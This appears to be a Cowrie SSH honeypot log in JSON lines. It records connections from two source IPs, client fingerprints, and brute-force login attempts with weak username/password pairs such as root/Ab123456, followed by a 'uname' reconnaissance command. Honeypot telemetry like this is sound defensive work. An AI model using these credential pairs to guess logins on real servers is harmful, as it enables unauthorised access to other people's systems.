{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34204,"dst_ip":"1.2.3.4","dst_port":22,"session":"e73929f5f376","protocol":"ssh","message":"New connection: 212.227.125.160:34204 (1.2.3.4:22) [session: e73929f5f376]","sensor":"my-vps","timestamp":"2025-08-28T05:24:47.151052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:24:47.151712Z","src_ip":"212.227.125.160","session":"e73929f5f376"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:24:47.256944Z","src_ip":"212.227.125.160","session":"e73929f5f376"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:24:47.585861Z","src_ip":"212.227.125.160","session":"e73929f5f376"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:24:47.892965Z","src_ip":"212.227.125.160","session":"e73929f5f376"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:24:47.893762Z","src_ip":"212.227.125.160","session":"e73929f5f376"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:48.000058Z","src_ip":"212.227.125.160","session":"e73929f5f376"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:48.001533Z","src_ip":"212.227.125.160","session":"e73929f5f376"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34767,"dst_ip":"1.2.3.4","dst_port":22,"session":"d23910868355","protocol":"ssh","message":"New connection: 212.227.235.229:34767 (1.2.3.4:22) [session: d23910868355]","sensor":"my-vps","timestamp":"2025-08-28T05:24:48.045624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:24:48.047032Z","src_ip":"212.227.235.229","session":"d23910868355"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:24:48.175982Z","src_ip":"212.227.235.229","session":"d23910868355"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin1","message":"login attempt [admin1/admin1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:24:48.775908Z","src_ip":"212.227.235.229","session":"d23910868355"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"admin@123","message":"login attempt [admin1/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:24:49.906957Z","src_ip":"212.227.235.229","session":"d23910868355"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abc123","message":"login attempt [admin1/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:24:51.038480Z","src_ip":"212.227.235.229","session":"d23910868355"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abcd123","message":"login attempt [admin1/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:24:52.201732Z","src_ip":"212.227.235.229","session":"d23910868355"}
{"eventid":"cowrie.login.failed","username":"admin1","password":"abcd1234","message":"login attempt [admin1/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:24:53.334017Z","src_ip":"212.227.235.229","session":"d23910868355"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35732,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba00e3d91873","protocol":"ssh","message":"New connection: 212.227.235.229:35732 (1.2.3.4:22) [session: ba00e3d91873]","sensor":"my-vps","timestamp":"2025-08-28T05:24:54.268320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:24:54.269227Z","src_ip":"212.227.235.229","session":"ba00e3d91873"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:24:54.413293Z","src_ip":"212.227.235.229","session":"ba00e3d91873"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:54.464077Z","src_ip":"212.227.235.229","session":"d23910868355"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:24:54.848032Z","src_ip":"212.227.235.229","session":"ba00e3d91873"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:24:55.994283Z","src_ip":"212.227.235.229","session":"ba00e3d91873"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54138,"dst_ip":"1.2.3.4","dst_port":22,"session":"d557075cfaa0","protocol":"ssh","message":"New connection: 212.227.125.160:54138 (1.2.3.4:22) [session: d557075cfaa0]","sensor":"my-vps","timestamp":"2025-08-28T05:25:02.256791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:25:02.257836Z","src_ip":"212.227.125.160","session":"d557075cfaa0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:25:02.362598Z","src_ip":"212.227.125.160","session":"d557075cfaa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":8896,"dst_ip":"1.2.3.4","dst_port":22,"session":"196aedb97e34","protocol":"ssh","message":"New connection: 212.227.125.160:8896 (1.2.3.4:22) [session: 196aedb97e34]","sensor":"my-vps","timestamp":"2025-08-28T05:25:02.468345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:25:02.470821Z","src_ip":"212.227.125.160","session":"196aedb97e34"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:25:02.530838Z","src_ip":"212.227.125.160","session":"196aedb97e34"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:25:02.699216Z","src_ip":"212.227.125.160","session":"d557075cfaa0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bravehea","message":"login attempt [admin/bravehea] failed","sensor":"my-vps","timestamp":"2025-08-28T05:25:02.851098Z","src_ip":"212.227.125.160","session":"196aedb97e34"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:03.805899Z","src_ip":"212.227.125.160","session":"d557075cfaa0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bookcase","message":"login attempt [admin/bookcase] failed","sensor":"my-vps","timestamp":"2025-08-28T05:25:03.912994Z","src_ip":"212.227.125.160","session":"196aedb97e34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44192,"dst_ip":"1.2.3.4","dst_port":22,"session":"c86572b87cc1","protocol":"ssh","message":"New connection: 212.227.125.160:44192 (1.2.3.4:22) [session: c86572b87cc1]","sensor":"my-vps","timestamp":"2025-08-28T05:25:04.877676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:25:04.886599Z","src_ip":"212.227.125.160","session":"c86572b87cc1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"blunted","message":"login attempt [admin/blunted] failed","sensor":"my-vps","timestamp":"2025-08-28T05:25:04.975529Z","src_ip":"212.227.125.160","session":"196aedb97e34"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:25:04.990929Z","src_ip":"212.227.125.160","session":"c86572b87cc1"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:25:05.402994Z","src_ip":"212.227.125.160","session":"c86572b87cc1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:25:05.629943Z","src_ip":"212.227.125.160","session":"c86572b87cc1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:25:05.630652Z","src_ip":"212.227.125.160","session":"c86572b87cc1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:05.736981Z","src_ip":"212.227.125.160","session":"c86572b87cc1"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:05.738145Z","src_ip":"212.227.125.160","session":"c86572b87cc1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"blackcock","message":"login attempt [admin/blackcock] failed","sensor":"my-vps","timestamp":"2025-08-28T05:25:06.037561Z","src_ip":"212.227.125.160","session":"196aedb97e34"}
{"eventid":"cowrie.login.failed","username":"admin","password":"biker1","message":"login attempt [admin/biker1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:25:07.099223Z","src_ip":"212.227.125.160","session":"196aedb97e34"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:08.162883Z","src_ip":"212.227.125.160","session":"196aedb97e34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43530,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cc8389546f7","protocol":"ssh","message":"New connection: 212.227.235.229:43530 (1.2.3.4:22) [session: 4cc8389546f7]","sensor":"my-vps","timestamp":"2025-08-28T05:25:09.147325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:25:09.147944Z","src_ip":"212.227.235.229","session":"4cc8389546f7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:25:09.291978Z","src_ip":"212.227.235.229","session":"4cc8389546f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:25:09.726020Z","src_ip":"212.227.235.229","session":"4cc8389546f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:25:10.111071Z","src_ip":"212.227.235.229","session":"4cc8389546f7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:25:10.111730Z","src_ip":"212.227.235.229","session":"4cc8389546f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:10.259436Z","src_ip":"212.227.235.229","session":"4cc8389546f7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:10.260486Z","src_ip":"212.227.235.229","session":"4cc8389546f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57058,"dst_ip":"1.2.3.4","dst_port":22,"session":"767be1a0aee6","protocol":"ssh","message":"New connection: 212.227.125.160:57058 (1.2.3.4:22) [session: 767be1a0aee6]","sensor":"my-vps","timestamp":"2025-08-28T05:25:16.635446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:25:16.697553Z","src_ip":"212.227.125.160","session":"767be1a0aee6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:25:16.790313Z","src_ip":"212.227.125.160","session":"767be1a0aee6"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:25:17.203011Z","src_ip":"212.227.125.160","session":"767be1a0aee6"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:18.007193Z","src_ip":"212.227.125.160","session":"2a19fc3bb48b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:25:18.319411Z","src_ip":"212.227.125.160","session":"767be1a0aee6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47566,"dst_ip":"1.2.3.4","dst_port":22,"session":"71893449289b","protocol":"ssh","message":"New connection: 212.227.125.160:47566 (1.2.3.4:22) [session: 71893449289b]","sensor":"my-vps","timestamp":"2025-08-28T05:25:38.350940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:25:38.351961Z","src_ip":"212.227.125.160","session":"71893449289b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55014,"dst_ip":"1.2.3.4","dst_port":22,"session":"9052ddd55589","protocol":"ssh","message":"New connection: 212.227.235.229:55014 (1.2.3.4:22) [session: 9052ddd55589]","sensor":"my-vps","timestamp":"2025-08-28T05:25:38.367095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:25:38.367996Z","src_ip":"212.227.235.229","session":"9052ddd55589"}
